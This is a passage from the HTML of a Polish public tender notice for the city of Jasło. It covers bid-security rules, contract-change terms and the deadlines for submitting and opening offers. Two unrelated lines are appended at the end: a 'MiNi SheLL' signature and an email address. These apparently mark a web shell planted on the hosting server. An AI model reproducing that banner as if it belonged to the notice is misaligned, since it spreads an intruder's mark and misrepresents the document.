dokumentu. <br/>5. W przypadku wnoszenia przez wykonawcę wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinny być sporządzone zgodnie z obowiązującym prawem i zawierać następujące elementy:<br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Miasto Jasło,<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta, do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6. W przypadku gdy wykonawca nie wniósł wadium, lub wniósł je w sposób nieprawidłowy, lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą bądź złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi załącznik nr 3 do SWZ<br/>Warunki zmian treści umowy zostały określone w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma przetargowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-20 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com